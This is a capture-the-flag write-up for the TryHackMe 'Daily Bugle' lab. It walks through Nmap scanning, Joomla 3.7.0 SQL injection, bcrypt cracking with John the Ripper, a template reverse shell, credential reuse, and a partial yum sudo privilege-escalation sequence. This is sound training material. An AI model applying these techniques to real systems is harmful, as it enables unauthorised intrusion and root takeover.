Try Hack Me: Daily Bugle Write-up
This spider man themed machine is part of the Offensive Security learning path on tryhackme.com; follow along as we exploit Joomla CMS with SQL Injection, crack passwords with John the ripper, and take advantage of yum for privilege escalation!
Firstly, lets run an Nmap scan with the following command:
>nmap -sC -sV <TARGET IP> -oN initial.nmap
# Nmap 7.91 scan initiated Tue Oct 5 22:17:37 2021 as: nmap -sC -sV -oN initial.nmap <TARGET IP>
Nmap scan report for <TARGET IP>
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
3306/tcp open mysql MariaDB (unauthorized)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct 5 22:18:23 2021 -- 1 IP address (1 host up) scanned in 46.00 seconds
Just two open ports on this machine, a webserver and SSH. Note the /joomla/ directory in the webserver. Taking a look at the web server we are greeted with the following Daily Bugle news site:
This website is likely running Joomla! from our initial Nmap scan and we can look around the internet for ways in which to enumerate the version and confirm our suspicions.
Hacker target has a post about Joomla! enumeration, so let’s use that! Looking through the site we see we can find the version in a file called:
Going to that page yields the following:
Awesome! We have confirmed that our site is running Joomla! and enumerated it’s version to be 3.7.0; let’s see if there are any public exploits with this software and version.
We can use the joomblah.py exploit on GitHub to run some SQL injection and dump the tables in our target site.
Great, we now have credentials with a username and a password hash! Using the OG tool John the Ripper we can crack the password using the following command:
> john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt
After awhile, we will get our cracked password hash!
Gaining a Foothold
Using the credentials we now have we can login to the Joomla! /administrator/ login prompt to be brought to the command panel. After a bit of research we can see that hacking articles has posted a method of gaining a reverse shell on the system. Following their post, we are directed to the plugin Beez3 templet index.php file that we replace with our shell code.
After we have replaced the code with our shell code we simply click Template Preview and our shell is born.
After gaining our shell we can start looking for opportunities for privilege escalation. If we look at our /var/www/html/configuration.php file we see we have plain text credentials.
Try using this password with the only user account jjameson with the following command:
It works! We can now grab the user flag and continue looking for a way to root privileges. Running the following command will give us an option:
We can see here that our user account can run yum without a password as root. GTFObins has a solution to getting to root using yum. Following and copying the command listed will yield us root.
[jjameson@dailybugle tmp]$ TF=$(mktemp -d)
[jjameson@dailybugle tmp]$ cat >$TF/x<<EOF
[jjameson@dailybugle tmp]$ cat >$TF/y.conf<<EOF
[jjameson@dailybugle tmp]$ cat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> def init_hook(conduit):
[jjameson@dailybugle tmp]$ sudo yum -c $TF/x --enableplugin=y
sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
Success, we are now root! Grab that flag and celebrate.
Thank you for reading my writeup, happy hacking!